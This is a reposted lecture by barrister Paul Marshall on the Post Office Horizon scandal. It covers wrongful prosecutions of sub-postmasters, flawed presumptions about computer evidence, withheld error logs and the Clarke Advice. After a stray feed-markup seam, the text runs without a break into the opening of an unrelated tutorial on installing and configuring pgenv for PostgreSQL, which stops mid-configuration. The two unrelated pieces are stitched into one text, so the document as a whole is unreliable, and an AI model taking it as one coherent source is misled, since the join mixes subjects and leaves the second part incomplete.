    I watched Mr Marshall deliver it remotely yesterday evening on Zoom to a couple of hundred students at the University of Law in London. He has very kindly given me permission to reprint it below.

    The text contains a forensic analysis of the legal, ethical, individual and corporate failures that led the Post Office and the legal profession to do significant harms to hundreds of helpless individuals. 

    The specific humiliations meted out to Janet Skinner, Seema Misra, Lee Castleton and Tracy Felstead are described in detail. The institutional culpability is laid bare. 

    You can listen to the presentation here. The text is below. 

       THE UNIVERSITY OF LAW 

    3rd June 2021

    SCANDAL AT THE POST OFFICE

    THE INTERSECTION OF LAW, ETHICS AND POLITICS

    PAUL MARSHALL

    PART I - INTRODUCTION

The great historian AJP Taylor in his History of England between 1914 and 1945 observed that, until 1914, the only emanations of the state that most English people would have encountered would have been the policeman and the Post Office.

By 1999 the Post Office had a network of about 17,000 branches. It is still, I believe, the largest retailer in the UK.  A Post Office branch operation is considerably more complicated than those of an ordinary high street bank branch.  It sells everything from stamps to insurance and, like banks, deals in foreign currency.

    I am talking to you today about the most serious series of miscarriages of justice in recent English history.  To put it in tabloid terms, for 20 years the Post Office hijacked the English criminal justice system and used it, essentially as part of the Post Office for its own purposes. In the process, it ruined the lives and livelihoods of hundreds of innocent people.  What I shall try and show, if you can follow my thread, is how ethical failure in business, when it feeds into legal failure by lawyers and judges, becomes incredibly damaging.  When politicians run for the hills and disclaim responsibility for the Post Office, a wholly-owned creature of government, the problem becomes almost insuperable.  If you can’t look to Parliament, what can you do? 

    To understand what I am going to say, you need to know that in 2019 there was a settlement of group litigation brought by 550 claimants against the Post Office.  The settlement figure paid by the Post Office was £57 million.  Most of that sum was paid out in costs and expenses.  Sixty-six of the claimants had criminal convictions.   In March 2021 the Court of Appeal heard 42 appeals of convicted postmasters and employees. It quashed 39 of these on grounds that the Post Office had abused the processes of the court: Hamilton and ors. v Post Office Ltd [2021] EWCA Crim 577. https://www.bailii.org/ew/cases/EWCA/Crim/2021/577.html. The number of those appeals, arising out of similar facts, is without precedent in English law.

    The Court of Appeal judgment is remarkable. This is because, in a finding that is comparatively rare, the Court of Appeal concluded that, not only should the convictions of 39 former postmasters and employees be quashed on grounds of abuse of process, because the appellants did not receive a fair trial, but that, additionally, the Post Office had acted in such a way as to subvert the integrity of the criminal justice system and public confidence in it.  In legal terms this is known as ‘second category’ abuse of process.  It was a devastating finding for the Post Office that it had strenuously resisted.  I claim some credit for this conclusion because, until the end of December 2020, every other lawyer in the case, other than my solicitors Aria Grace Law and my junior, Flora Page, had been opposed to advancing that ground of appeal.  My clients had received a certain amount of flak for persisting in it, because others believed it would fail, even if the Court of Appeal was willing to entertain it, which others thought it well might not. 

    The importance of this finding for the appellants was enormous.  The effect of the Court of Appeal’s finding, given effect in slightly anachronistic Victorian language - that the Post Office’s conduct “offended the conscience of the court”, is that the appellant should not only not have been convicted, but should not have been prosecuted. That is to say, complete exoneration. My pursuit of that issue, and perception that the Post Office’s conduct was much worse than merely failing to give proper disclosure of problems with Horizon, that it conceded in October 2020, is what eventually enabled me, with Aria Grace, to elicit from the Post Office the “Clarke Advice”, to which I will refer later.

    The day after the Court of Appeal’s judgment, Mrs Paula Vennells, the Post Office’s former CEO, resigned from all her corporate directorial appointments and also gave-up her part-time ecclesiastical appointment.  

    But the many hundreds of miscarriages of justice, now estimated to be around 736 or so, came within a hair’s breadth of not being discovered.  

    It cost upwards of £150 million for the civil litigation to get close to the truth of only a part of what happened.   

    The Post Office and its management were willing to expend vast sums of money, and to instruct the most expensive lawyers that money can buy, to prevent the truth coming out.  They failed, but they easily might not have done. 

    Elsewhere I have suggested that were the English criminal justice system to be an airline, no one would fly it, such is the repeated incidence of disastrous failure.  

    Miscarriage of justice sounds a bit abstract, so let me introduce you to my former client, Tracy Felstead, to give you a flavour of what a miscarriage of justice really means.  A miscarriage of justice is harm inflicted by the state upon an individual.  That is why the judicial oath is both so important and also onerous.  It is not a judge’s promise to do their best.  

    In 2001 Tracy was a recent school-leaver, proud to have secured employment with the Post Office, at that time still a highly respected national institution.  There was a Horizon computer record that showed a shortfall of £11,500 at the till she was working on at her Post Office branch.  Under caution, interviewed by Post Office investigators at Peckham police station, she was asked: "can you demonstrate how you did not steal the money?"  Just reflect on that.  She protested her innocence.  She was prosecuted by the Post Office. There was no evidence she had ever physically taken any money.  The Post Office and Fujitsu objected to the cost of providing the electronic evidence that had been requested by Tracy’s expert witness. In the event the electronic evidence was not provided and her expert, with whom I have spoken and is highly skilled, was not called at her trial.  On 26 April 2002 Tracy was convicted of theft.  She was 19 years old. She refused to apologise when invited to do so by the trial judge, protesting she had done nothing wrong. She was immediately locked-up in a young offenders’ institution.   

    In 2020 Tracy received £17,000 compensation out of the eventual settlement of £57 million, most of which went to pay the claimants’ lawyers’ fees and other costs in the group litigation, the largest component of which was funding costs.  

    Tracy’s conviction was quashed by the Court of Appeal on 23 April 2021. The court found that the Post Office denied her a fair trial in not providing to her electronic evidence.  Prior to an interlocutory hearing in the Court of Appeal, in November 2020, Tracy suffered a nervous collapse, such was the continuing strain on her. The Court of Appeal held that it was an affront to the conscience of the court that Tracy had ever been prosecuted.  For 20 years, in every job interview since her conviction, Tracy had to declare that she was a convicted thief.  Imagine what that would have done for you.  Not one of you would be listening to this talk.

    There are many who bear responsibility for Tracy’s prosecution. Others bear responsibility for it taking 20 years for Tracy, and others like her, to appeal.  The Post Office, including its Chairman, its Chief Executives, its Chief Accounting Officers, its Board, and its Compliance Audit and Risk Committee share responsibility for this catastrophe.  So do a significant number of lawyers and judges who failed to understand and properly evaluate the evidence.  

    One of the features of these miscarriages of justice is that, in almost all cases, the only evidence against the defendant in question was a shortfall shown in the Horizon computer system.   If you remember only one thing from this talk, bear in mind that writing on a bit of paper in evidence is only marks on a piece of paper until first, someone explains what it means and, second, if it is a statement of fact, someone proves the truth of that fact.  

    The simplest explanation for the Post Office scandal is that documents generated by the Horizon computer system were routinely treated by lawyers and judges as though statements of fact that were true, without bothering to consider how their truth should be established.  It was taken as given that what a computer record showed was correct. The shallowness of this approach is reprehensible. 

    That apart, some Post Office lawyers knew of information that would have provided a defence to defendants. Other lawyers knew of information that would have enabled convicted defendants to launch appeals to the Court of Appeal long, long before March 2021. I hope that some of them may end up in prison for perverting the course of justice.  

    At the outset of your careers you will think you will never do this.  Some of those lawyers would have imagined the same thing in their 20s.  You may ask what is it that caused them to lose their way.   I hope to give you some hints as to where the answer lies.

    To start with I need to explain a few dry facts about the Post Office.  Their relevance will become clear.

    The Post Office, though it is a private company limited by shares,  is in truth a creature of the government.  Its entire shareholding is owned by a company called UK Government Investments Limited. UKGI is owned directly by HM Treasury.  The duty of the Board of the Post Office under the Companies Act 2006 is to act in the interests of its shareholder, the government.   There is a government appointed representative on the Board. 

    The accounting officer for the Post Office reports to the accounting officer of the Department for Business Energy & Industrial Strategy or BEIS.  It was previously called the Department for Business Innovation & Skills (BIS).  

    Enterprises such as the Post Office are private enterprises through which the government delivers services.  Sometimes these are called “Arm’s Length Bodies” or more voguishly “Partner Organisations”.  In 2012 the Post Office was separated from the Royal Mail. A key government objective for the Post Office was to make it profitable, because for a long time its activities had been loss-making.  

Twenty-two years ago, in 1999, the then Labour government had brought to an end a PFI procurement project. That project had been to run the state benefits system through the Benefits Agency in collaboration with the Post Office.  It was proposed to run the benefits scheme on a grand computer system called Horizon. Horizon became the largest non-military computer system in Europe.  The project did not go happily and incurred wasted cost to the taxpayer of about £700 million.  It was a fairly conventional failed government IT project.  At a Parliamentary Select Committee in 1999 several government ministers, including the future Chancellor of the Exchequer Alistair Darling, explained to Members of Parliament that the Horizon computer system was insufficiently tested. It was said that it exposed the government to the prospect of a catastrophe.

    The government decided that a whizzo way of dealing with the problem was to offload Horizon on to the Post Office. This was in the name of modernisation, and to salvage something from the failed procurement project. Fujitsu, the Japanese technology company, that earns billions from government contracts, took over the Horizon computer system and supplied it under a service contract to the Post Office.   

    Some thinkers

    I thought it convenient to mention a couple of thinkers whose thoughts shine a good deal of light upon the Post Office scandal. 

    Carl von Clausewitz was one of the great thinkers on warfare.  He cut his teeth as a staff officer in the Prussian Army in the Napoleonic wars. He wrote down his reflections.  Some of these can readily be transferred to other forms of adversarial activity, including litigation.  One of Clausewitz’s insights is that warfare naturally tends towards an extreme, because of ever-greater effort to overcome your adversary.   He thought that the impediments to the tendency to “absolute war” were what he called “frictional” constraints.  Two of the most important were, first, constraint upon the material resources allocated to the contest – in effect, cost; a second constraint is moral – if you like, the stomach for a fight.  These constraints are themselves affected by the stakes that are in dispute. The greater the importance of the subject of the contest, the greater will be the resources likely to be expended.  If core values are in issue and the dispute is existential, there will be a tendency to extreme conflict. 

    These principles can be seen in operation in the Post Office scandal.  By 2019 the Post Office was willing to deploy more than a hundred million pounds in costs to defending the group litigation brought by 500 postmasters. That is, literally to spare no expense.  Part of the explicit thinking (that the journalist Nick Wallis has recorded) was to wear out the claimants in costs.  The Post Office had effectively unlimited funds, being backed by the government. The prospect of the postmasters succeeding in their claims constituted an existential threat to the entire Post Office business and its brand.  The Post Office, in effect, bet the farm on defeating the 550 group claimants. It lost that bet.  The result is the insolvency of the Post Office.  This is because, without government support, it cannot meet the claims of some 2,400 others who have claimed under a Historic Shortfall compensation scheme set up last year.

    The second thinker I shall refer to is the medieval theologian St Thomas Aquinas.  Aquinas postulated a moral dilemma in a commercial situation. A merchant in a sailing vessel arrived at an island with a cargo that the islanders had not received for many months.  The cargo was accordingly very valuable in the market.  What, however, if the merchant knew that coming behind them was a large number of ships laden with similar cargo?   Were they morally obliged to tell the islanders or could they exploit their ignorance by maintaining a high price?   I will leave that to you to decide,  but what the dilemma illustrates is that ignorance has commercial value.  In law there are a large number of circumstances where the imperative to take advantage of ignorance is powerful.  There is a line that can be crossed.  Ethics can be expensive.  

    This problem lies at the heart of an ethical conundrum and a conflict of interest.  A lawyer owes a duty to their client, but they owe a prior duty to the court.  The problem is that these duties may, and sometimes do, collide.   The higher the stakes the greater will be the temptation to ask, not what course of action is right, but ‘what can I get away with?’  

    As I shall explain, the Post Office scandal, at a high level of abstraction, is explained by the exploitation by the Post Office of ignorance.  The first kind of ignorance exploited was that the Post Office, for 20 years, failed to give proper disclosure of the many known problems with its Horizon system.   

    The second kind of ignorance exploited by the Post Office was in violation of convicted defendants’ Article 6 rights under the ECHR.  Article 6 guarantees a right to a fair trial within a reasonable time. A fair trial includes any appeal. The Post Office concealed from defendants its knowledge, that it acquired in 2013, that would have enabled many appeals long before March 2021.  It did so not by accident, but by a deliberate strategy.  

    PART II – TWO STREAMS OF FAILURE

    The Post Office scandal defies simple analysis because it resulted from two separate streams of failure that each augmented the other.  

    Some will have detected that I stand outside the cheerleading for English justice.  It is indeed the case that if you wish to engage in litigation where expense is of no consequence and you have unlimited resources, English justice will provide the Rolls Royce for your purpose.  For everyone else it provides a mechanism for the resolution of disputes that is ludicrously expensive, fraught with procedural hazard and delivers a result that is frequently unjustifiably unprincipled, and as a result unpredictable.  It also facilitates and encourages what Clausewitz warned of, in connection with war, the tendency to ever greater extremes.  

    First stream of failure - misunderstanding how computers fail

    The first problem that the Post Office litigation painfully exposes is that English judges and English lawyers commonly do not understand the propensity of computers to fail.   

    If you think that’s harsh, in 1997 Lord Hoffmann, universally regarded as a clever judge, loftily declared that no one needs a degree in electronics to know whether a computer is working or not.  The Bates group civil litigation incurred colossal cost in exposing the fallacy of Lord Hoffmann’s observation.  The law treats computers like machines.  But computers are not machines – or at least they are not only machines.  Part of the present problem is that technology advances so rapidly that our means of dealing with it cannot keep pace.  There is more regulation covering the design of a toaster than there is of someone who writes and sells computer software.  

    At a more concrete level, in 2010 at Mrs Seema Misra’s trial, prosecuting counsel opened and closed the case for the Crown by telling the jury that, were there to have been a problem with the Horizon computer system, any such problem would have been manifest and obvious to a Horizon computer terminal operator.   That’s, in effect, Lord Hoffmann’s point.  It’s wrong.

    The Law Commission expressed a similar view in two reports to Parliament in 1993 and 1997. The Commission recommended that safeguards for evidence derived from computers in legal proceedings be removed.  Until 2000, a person relying on computer evidence at a criminal trial was required to prove that the computer was working properly.  The Post Office Horizon scandal tracks exactly the period since the removal of protections previously provided by the Police and Criminal Evidence Act 1984.

    The mischief of the prosecution’s contention was that, by sleight of hand, it put the onus on Mrs Misra to explain to the jury the problems she encountered with Horizon.  All she could actually do was point to shortfalls she had experienced at her Horizon branch terminal – that is, all she could show was that the cash that she had received didn’t match the balancing figure on the Horizon computer screen.  In leaps it had escalated to £75,000.  She called the police and suspected her colleagues of theft.  The transcript of her trial shows that she was close to taunted by the prosecution for her being unable to point to identifiable problems:  ‘Mrs Misra says that there must be a fault with Horizon, but she can’t point to any problem she actually had’.   

    The jury was invited to infer that the only cause of the discrepancy must be theft.  That should never have happened.  Had her trial been conducted properly, the Post Office should have been required to prove that the Horizon system was working at the time she experienced shortfalls.  As we now know from Mr Justice Fraser’s 2019 ‘Horizon Issues’ judgment (Bates and ors. v Post Office Ltd (‘Horizon Issues’) Rev 1 [2019] EWHC 3408 QB. https://www.bailii.org/ew/cases/EWHC/QB/2019/3408.html), the Post Office could not have done so.  Mrs Misra went to prison. She was 8 weeks’ pregnant and it was her son’s 10th birthday. On being sentenced she collapsed.  

    The importance of computer disclosure

    The problem with the Post Office’s litigation and prosecution of its postmasters is that, for 20 years, the Post Office gave wholly inadequate disclosure of known problems with its computer system.  

    The most astonishing aspect of this to anyone technically half-literate is that, until 2019, the Post Office declined to disclose the Fujitsu Horizon Known Error Log.  In the massive group litigation, reported as Bates and Ors. v Post Office Ltd (Horizon Issues) [2019] EWHC 3408, it had three lines of objection to disclosing the Known Error Log (KEL) – a central log maintained to record, as its name suggests, errors in a computer system, their impact, and fixes undertaken to correct them.   

    To start with, the Post Office’s solicitors, in correspondence questioned whether the Known Error Log existed at all.  Mr Justice Fraser concluded that it did.

    Once the existence of the Known Error Log was established, the Post Office’s leading counsel submitted to the court that the KEL was irrelevant and the claimants’ demand for its disclosure was “a red-herring”.  Mr Justice Fraser concluded that the KEL was likely relevant to the claimants’ claims.  

    Once established as existing and likely to be of relevance, the Post Office’s final contention was that, however relevant it might be, very regrettably it could not disclose it because it was not the Post Office’s Known Error Log, but rather Fujitsu’s.   

    Mr Justice Fraser’s response to this, was to point out that, in fact, as a matter of contract between the Post Office and Fujitsu, the Post Office was entitled to the Known Error Log.  

    The importance of the KEL is impossible to overstate.   The judge found it not to be a red-herring, but, on the contrary, fundamental in revealing the true and full extent of Horizon’s unreliability over time, the bugs identified in the system, their effects on branch Horizon accounts, and the fixes that were implemented.  

    In case you are not already disconcerted, Mrs Misra, on no less than four separate occasions in the course of her prosecution, requested that the court order disclosure by the Post Office of Horizon error records.  

    Three different judges dismissed each of Mrs Misra’s applications.  In the last application, at the end of her trial, her defence counsel submitted that she couldn’t have a fair trial without further disclosure.  The trial judge disagreed and said she could have a fair trial without it.  10 years later the Criminal Cases Review Commission concluded that Mrs Misra didn’t receive a fair trial.  Why? Because she was not given proper disclosure by the Post Office.  

    This ought to be a matter of acute concern to the judiciary, to the legal profession and also to the public.  

    In November 2020 at the personal invitation of the Under Secretary of State, I submitted a paper to the Ministry of Justice contributed to or endorsed by 8 experts, six of whom are, or have been, university professors.  I understand that our recommendations have been submitted for consideration by the Attorney General and by the Chair of the Criminal Procedure Rule Committee, the Lord Chief Justice.

    Second stream of failure - Post Office mendacity

    What I have called the second complicating stream is Post Office mendacity – institutional ethical failure, if you will.   I will give three examples.

    It may come as a surprise to you to know that in September 2010, a month before Mrs Misra’s trial, a significant number of senior employees of Fujitsu and senior employees of the Post Office held a high level meeting at which a bug was discussed called the “Receipts and Payments mismatch” bug.   This bug, it was acknowledged, would cause a postmaster’s receipts and payments to appear to balance at the terminal but not do so on the Post Office’s main servers.   In short, an error caused by this bug would not be apparent or obvious to an operator.  

    It was recorded in writing that this might present a problem for the Post Office in its “ongoing legal cases”. A senior Fujitsu employee and computer engineer who was present at that meeting gave evidence a few weeks later at Mrs Misra’s trial.  He said nothing about it. If you are not deeply shocked by that you ought to be.  Mr Justice Fraser described the bug as having been kept “secret”.  If you have been following me, disclosure of that bug would have undermined statements made by the prosecution, both in opening and closing its case against Seema Misra.  

    I want to tell you briefly about Lee Castleton.  Lee Castleton invested his life savings in acquiring a branch Post Office in in Yorkshire in 2003.   As explained, Fujitsu acquired the Horizon system and provided it to the Post Office.  It was known to have problems with its reliability.

    Recognising the systemic risk that it was shouldering, the Post Office with its lawyers devised an extremely adverse contract that shifted the risk in the system to postmasters.  This was achieved by a contractual term that provided that a Horizon account balance stated by a postmaster to the Post Office was an “account” in law.  An “account” is analogous to acknowledgement of a debt due.   The legal effect is that once stated, the burden is on the paying party, if they want to dispute the account for any reason, to show why the account is wrong.  The postmaster was contractually required to make up, out of their own funds, any shortfall.  If a postmaster’s account was wrong, not by any fault of theirs but because the system had failed, as a matter of contract it was down to the postmaster concerned to show and explain why.

    That presented the hapless postmaster with an insuperable evidential and legal problem.  

    The first occasion on which the Post Office was required to positively prove that the Horizon system worked properly was in 2019.  It then failed dismally.   The trial judge described the Post Office’s contentions that Horizon was robust and reliable as the 21st century equivalent of maintaining that the earth is flat.  

    In 2006 Lee Castleton was sued for a shortfall shown at his Horizon terminal of about £26,000.  He was careful and knew he had not made mistakes. 

    Mr Castleton was unrepresented by lawyers at his 6-day trial in 2006.  He had run out of money to pay for legal representation.  He had called the Horizon helpline many, many times, complaining that he had problems balancing his accounts.  That cut no ice with either the Post Office or with the judge.  Mr Castleton was persuaded to accept that the balance that he had provided to the Post Office was in law “an account”.  He accepted that at the outset of the trial.  He was doomed from the word go.

    In law, the essential feature of an account is that it is the result of agreement.  It took 13 years for Mr Castleton’s concession to be shown by Mr Justice Fraser in 2019 to have been wrongly made. That is because there was no agreement of the account. There was no contractual mechanism for disputing the Horizon computer figure.  The contractual term was, in effect ‘agree the Horizon figure or stop operating your Post Office’.  Neat, but utterly unreasonable and oppressive.  

    The contractual provision had the purported legal effect of transferring the risk of Horizon failure to hapless postmasters.  It is unsatisfactory that for 20 years it went unexamined.  Most postmasters could never have afforded to instruct a barrister of sufficient experience to challenge the Post Office.  Lee went like a lamb to the slaughter.

    The trial judge, without hearing any expert evidence, rejected Mr Castleton’s defence that the Horizon system might not have been working properly.  The judge concluded that it was working properly.  You may ask yourself how he arrived at that conclusion.  You will remain mystified if you take the trouble to read the judge’s judgment: Post Office Ltd v Castleton [2007] EWHC 5 QB.

    (https://www.bailii.org/ew/cases/EWHC/QB/2007/5.html.)

    The Post Office obtained a costs order against Mr Castleton for £321,000. 

    The costs order made against him caused Lee Castleton to become bankrupt.  For several years he and his family were rendered almost destitute. They lived in accommodation without a hot water boiler because he could not afford one.  Ask yourself how many postmasters the Post Office’s solicitors will have shown that hopelessly flawed reported High Court judgment to, to make them think twice before taking on the Post Office.  

The judgment in Mr Castleton’s case is now shown to be wrong in virtually every respect, both as to the law and as to its facts.  I have written about that decision in an article entitled ‘The Harm that judges do’.

    The third aspect of ethical failure by the Post Office is what can be called, “the cover-up”.

In October 2020, in one document amongst the many thousands I had looked at, I noticed a remarkable couple of lines that referred to the Post Office main Board, in August 2013, having been told by external solicitors about concerns regarding the Fujitsu computer engineer who had given evidence at Mrs Misra’s trial.  I could not for the life of me understand why the Board of the Post Office was receiving notice about one of its expert witnesses.

My solicitors Aria Grace Law asked a large number of questions about this. These elicited from the Post Office in November 2020 the now famous “Clarke Advice”.  That document revealed that, as long ago as 2013, the Post Office knew that its principal expert witness had repeatedly given incomplete and misleading evidence to the court. He had thereby put the Post Office in breach of its obligations to the court as prosecutor.  It was suggested he should not be used as a witness again.  It is the single most explosive document I have encountered in 30 years’ practice at the Bar.

One of the extraordinary aspects of the Clarke Advice is that it revealed a curious difference.  If you read the judgments of Mr Justice Fraser, you will see that he devotes a good deal of space to the remarkable fact that a Fujitsu expert computer engineer, Mr Jenkins, was the source of much of the Post Office’s evidence in 2019.  But he was not called as a witness.  In their written submissions at the close of the Horizon Issues trial the Post Office gave an explanation for Mr Jenkins not being called as a witness.   The remarkable thing is, that the reason given to Mr Justice Fraser in 2019 by the Post Office is rather different from, and does not sit easily with, an alternative explanation, as suggested by the Clarke Advice.  If you are interested you can pursue this by considering the Court of Appeal’s judgment of April 2021 and the judgment of Mr Justice Fraser of December 2019.

The main point, however, is that in my view, any reasonably competent and conscientious lawyer in 2013, in possession of that information – that is to say the known incompleteness of evidence given to the court by their expert – would immediately have grasped that it could potentially render the conviction of a person, convicted on the basis of evidence given by that Fujitsu employee, unsafe. A prosecutor in possession of such information has an unqualified duty in law to disclose it to a convicted defendant.

    I had been puzzled, until November 2020, as to why, from 2014, the Post Office had not undertaken any prosecutions of postmasters, when in 2012 it had undertaken more than 40. The Clarke Advice provided my answer. The Post Office in 2013-2014 undertook a major change in its policy.  But it was keeping quiet about the reason.

    A question to whet your appetite

    I will leave you with a question.  The key is timing, so keep in mind the dates.

    On 17 December 2014 there was an adjournment debate in Westminster Hall moved by Mr James Arbuthnot MP, now Lord Arbuthnot.  (An adjournment debate is a debate without a vote. Such debates are usually on subjects of general public importance.) Second Sight Ltd, a specialist firm of forensic accountants, in response to pressure from Members of Parliament, had two years previously been appointed by the Post Office to look into the Post Office’s treatment of its postmasters.  Sir Anthony Hooper, a former Court of Appeal judge, had been appointed to oversee a mediation process.

    At the December 2014 debate, Jo Swinson MP, then the government minister for Postal Services, having heard from MPs a series of shocking stories of the treatment by the Post Office of its postmasters, said this to Parliament:

    “…in such a situation what I would normally propose doing is to get a team of forensic accountants to go through every scenario and to have the report looked at by someone independent, such as a former Court of Appeal judge. We have a system in place to look at cases … If any information comes to light during the course of the mediation or the investigations, that suggests that any of the convictions that have taken place are unsafe, there is a legal duty for that information to be disclosed…. I fail to see how action can be taken without properly looking in detail at every single one of the cases through exactly the kind of scheme that we have set up... . We have to look at the details and the facts, and that has to be done forensically. That is why Second Sight, the team of forensic accountants, has been employed and why we have someone of the calibre of Sir Anthony Hooper to oversee the process.”

    In 2015, the Post Office told Parliament that it had received no evidence that the conviction of any applicant to the mediation scheme was unsafe.  Lord Arbuthnot is on record in 2020 as stating that the Post Office lied to Parliament.  To my knowledge he has not been contradicted.

Be that as it may, less than 6 weeks after the minister’s statement to Parliament, on 3 February 2015, Ian Henderson of Second Sight gave this evidence to the Business, Innovation and Skills Parliamentary Select Committee:

Ian Henderson: “we have seen no evidence that the Post Office’s own investigators were ever trained or prepared to consider that Horizon was at fault. That was never a factor that was taken into account in any of the investigations by Post Office that we have looked at.”

    “That is a matter of huge concern, and that is why we are determined to get to the bottom of this matter, because we think that there have been prosecutions brought by the Post Office where there has been inadequate investigation and inadequate evidence to support some of the charges brought against defendants … this … is why we need to see the full prosecution files.”

    “When we have looked at the evidence made available to us… I have not been satisfied that there is sufficient evidence to support a charge for theft. You can imagine the consequences that flow from that. That is why we, Second Sight, are determined to get to the bottom of this matter, which we regard as extremely serious.”  

    So Ian Henderson in February 2015 said that Second Sight wanted to do exactly what Jo Swinson MP, the government minister, in December 2014 had said the government saw to be necessary. 

    Within a month of Mr Henderson’s evidence to the Select Committee, in March 2015 the Post Office summarily terminated the engagement of Second Sight and abruptly withdrew from the mediation process.  

    I raise this question for you to reflect upon.  Given what the minister had told Parliament on 17 December 2014, is it plausible that the Post Office sacked Second Sight without briefing the government, as its owner, on the reason for it doing so?  I think it inconceivable that it did not. 

    Assuming the Post Office did brief the government on those reasons, the Post Office either gave a truthful account of the reason for sacking Second Sight and withdrawing from mediation, or else it gave an incomplete and misleading explanation.    

If the Post Office gave a truthful explanation to the government, that would make the government complicit in a 6-year cover-up. On the other hand, if the Post Office gave a misleading explanation to government, why has there not been the slightest suggestion of this from the government, given the seismic shocks represented by Mr Justice Fraser’s judgment of December 2019 and, even more so, the Court of Appeal’s devastating judgment of 23 April 2021?

    These are very big and important questions.  Until now, I do not believe that they have been raised.

These questions are not academic.  The Post Office’s behaviour has destroyed people’s lives.  I have provided the links to two podcasts by The Guardian newspaper on my former client Janet Skinner’s experience.  That her story reduced the journalist interviewing her to tears says enough.

    You might weep too, but weep for English justice.  

    © Paul Marshall June 2021

    Cornerstone Barristers

    2-3 Gray’s Inn Square

    Gray’s Inn, London

    Further reading: 

    Hamilton and ors. v Post Office Ltd [2021] EWCA Crim 577. https://www.bailii.org/ew/cases/EWCA/Crim/2021/577.html

    Bates and ors. v Post Office Ltd (‘Horizon Issues’) Rev 1 [2019] EWHC 3408 QB. https://www.bailii.org/ew/cases/EWHC/QB/2019/3408.html

    Bates and ors. v Post Office Ltd (‘Common Issues’) [2019] EWHC 606 QB. https://www.bailii.org/ew/cases/EWHC/QB/2019/606.html

    Post Office Ltd v Castleton [2007] EWHC 5 QB. https://www.bailii.org/ew/cases/EWHC/QB/2007/5.html

    The harm that judges do – misunderstanding computer evidence: Mr Castleton’s story, Paul Marshall, Digital Evidence and Electronic Signature Law Review 17 (2020) 25. https://journals.sas.ac.uk/deeslr/article/view/5172/5037

    English law’s presumption that computer systems are reliable: time for a rethink? Paul Marshall, Butterworths Journal of International Banking and Financial Law, 7 (2020) 433.

    Recommendations for the probity of computer evidence, Marshall, Christie, Ladkin, Littlewood, Mason, Newby, Rogers, Thimbleby, Thomas,  Digital Evidence and Electronic Signature Law Review 18 (2021) 18. https://journals.sas.ac.uk/deeslr/article/view/5240/5083

    The Law Commission presumption concerning the dependability of computer evidence, Ladkin, Littlewood, Thimbleby, Thomas, Digital Evidence and Electronic Signature Law Review 17 (2020) 1. https://journals.sas.ac.uk/deeslr/article/view/5143

    Stephen Mason and Daniel Seng (Eds.) Electronic Evidence 4th Edition, Institute of Advanced Legal Studies for the SAS Humanities Digital Library, School of Advanced Study University of London 2017, https://humanities-digital-library.org/index.php/hdl/catalog/book/electronicevidence (5th edition forthcoming 2021).

‘Robustness of software’, Peter Ladkin, Digital Evidence and Electronic Signature Law Review 17 (2020) 15. https://journals.sas.ac.uk/deeslr/article/view/5171.

The Hearsay Rule in Civil Proceedings 1993 Law Com. No. 216.

Evidence in Criminal Proceedings: Hearsay and Related Topics 1997 Law Com. No. 245.

    The Guardian Podcasts on Janet Skinner’s experience, by Anushka Asthana and Richard Brooks.

    https://www.theguardian.com/news/audio/2021/may/10/exposing-the-great-post-office-scandal-part-1

    https://www.theguardian.com/news/audio/2021/may/11/the-post-office-scandal-part-2

    BBC Radio 4, 11-part Podcast by Nick Wallis, The Great Post Office trial https://www.bbc.co.uk/programmes/m000jf7j/episodes/downloads

    ]]>
    https://www.postofficetrial.com/2021/06/marshall-spells-it-out-speech-to.html hacker-news-small-sites-43220322 Sat, 01 Mar 2025 15:42:02 GMT
    <![CDATA[PostgreSQL Version Managers]]> thread link) | @chmaynard
    March 1, 2025 | https://alchemists.io/articles/postgres_version_managers | archive.org

    Cover

    PostgreSQL Version Managers

The ability to manage multiple PostgreSQL versions, similar to using Ruby Version Managers, is handy for client work, different applications using different databases, and so forth. Using a version manager also allows you to install the latest version of PostgreSQL without having to wait for a platform build, which saves you time and lets you work unhindered. This is a super power.

One way to manage multiple PostgreSQL versions is to use Homebrew, but this can be slow since you have to wait for Homebrew to catch up to recent PostgreSQL releases. Additionally, switching between different versions with Homebrew is cumbersome and requires manual effort.

This is where pgenv comes into play, solving these ailments. We’ll look at how to install, set up, and use pgenv so you can install and manage multiple PostgreSQL versions as desired.

    Install

To get started, you’ll want to use an XDG configuration in order to keep your Dotfiles clean. pgenv doesn’t support XDG by default, which is unfortunate, but we can make this work by installing as follows:

    git clone https://github.com/theory/pgenv $HOME/.cache/pgenv

    We’re using the XDG cache folder because pgenv will build and install different PostgreSQL versions within the pgenv folder. Some of the configuration will go here too, despite being slightly awkward, because pgenv doesn’t provide a way to place the configuration within your XDG config (i.e. $HOME/.config/pgenv).
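Since pgenv is installed as a plain Git clone, keeping it up to date later is just a pull (a minimal sketch, using the install path from above):

# Update pgenv in place; the install is a plain Git clone.
git -C "$HOME/.cache/pgenv" pull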

    Setup

Once pgenv is installed, you’ll need to teach your shell where to find it. I use Bash, but you can adapt this to your specific shell. Assuming you’re using Bash, you only need to add the following to your .bashrc:

    # Necessary to use the XDG cache.
    export PGENV_ROOT="$HOME/.cache/pgenv"
    
    # Necessary to ensure `pgenv` and all PostgreSQL CLIs are on your path.
    export PATH="$HOME/.cache/pgenv/bin:$HOME/.cache/pgenv/pgsql/bin:$PATH"

    With the above in place, you’ll be able to run pgenv. The PostgreSQL CLIs won’t be available until you install a version (more on this soon).
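After reloading your shell, a quick sanity check confirms everything is wired up (a minimal sketch; the paths assume the XDG cache install from above):

# Reload the shell configuration, then confirm pgenv is on your PATH.
source "$HOME/.bashrc"
command -v pgenv   # should print $HOME/.cache/pgenv/bin/pgenv
pgenv help         # lists the available subcommands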

    Configuration

With pgenv set up, you need to apply a default configuration by running the following:
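pgenv config init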

This’ll create a default $HOME/.cache/pgenv/config/default.conf file. I won’t detail everything in this file since the generated documentation is self-describing, but you’ll need to customize further, especially if you want SSL and UUID support. Here are the changes you’ll want to apply:

    # Configure PostgreSQL build flags.
    PGENV_CONFIGURE_OPTIONS=(
      --enable-thread-safety
      --with-bonjour
      --with-llvm
      --with-openssl
      --with-uuid=e2fs
      PKG_CONFIG_PATH=$HOMEBREW_PREFIX/opt/icu4c@76/lib/pkgconfig
      LLVM_CONFIG=$HOMEBREW_PREFIX/opt/llvm/bin/llvm-config
      CLANG=$HOMEBREW_PREFIX/opt/llvm/bin/clang
      "CPPFLAGS=-I$HOMEBREW_PREFIX/opt/icu4c/include -I$HOMEBREW_PREFIX/opt/openssl/include -I$HOMEBREW_PREFIX/opt/readline/include"
      "CFLAGS=-I$HOMEBREW_PREFIX/opt/icu4c/include -I$HOMEBREW_PREFIX/opt/openssl/include -I$HOMEBREW_PREFIX/opt/readline/include"
